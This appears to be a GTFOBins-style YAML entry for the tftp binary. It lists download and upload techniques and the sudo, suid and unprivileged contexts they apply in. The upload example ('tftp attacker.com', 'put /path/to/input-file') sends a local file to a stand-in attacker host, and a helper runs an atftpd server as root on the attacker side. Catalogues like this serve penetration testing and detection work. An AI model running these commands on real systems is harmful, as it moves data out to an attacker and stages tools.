Files

30 lines
676 B
Plaintext

---
functions:
download:
- code: |-
tftp attacker.com
get /path/to/input-file
contexts:
sudo:
suid:
unprivileged:
sender:
code: |-
atftpd --no-fork --verbose --daemon --no-fork --user root.root .
comment: |-
A TFTP server can be used on the attacker box to send the data.
upload:
- code: |-
tftp attacker.com
put /path/to/input-file
contexts:
sudo:
suid:
unprivileged:
receiver:
code: |-
atftpd --no-fork --verbose --daemon --no-fork --user root.root .
comment: |-
A TFTP server can be used on the attacker box to receive the data.
...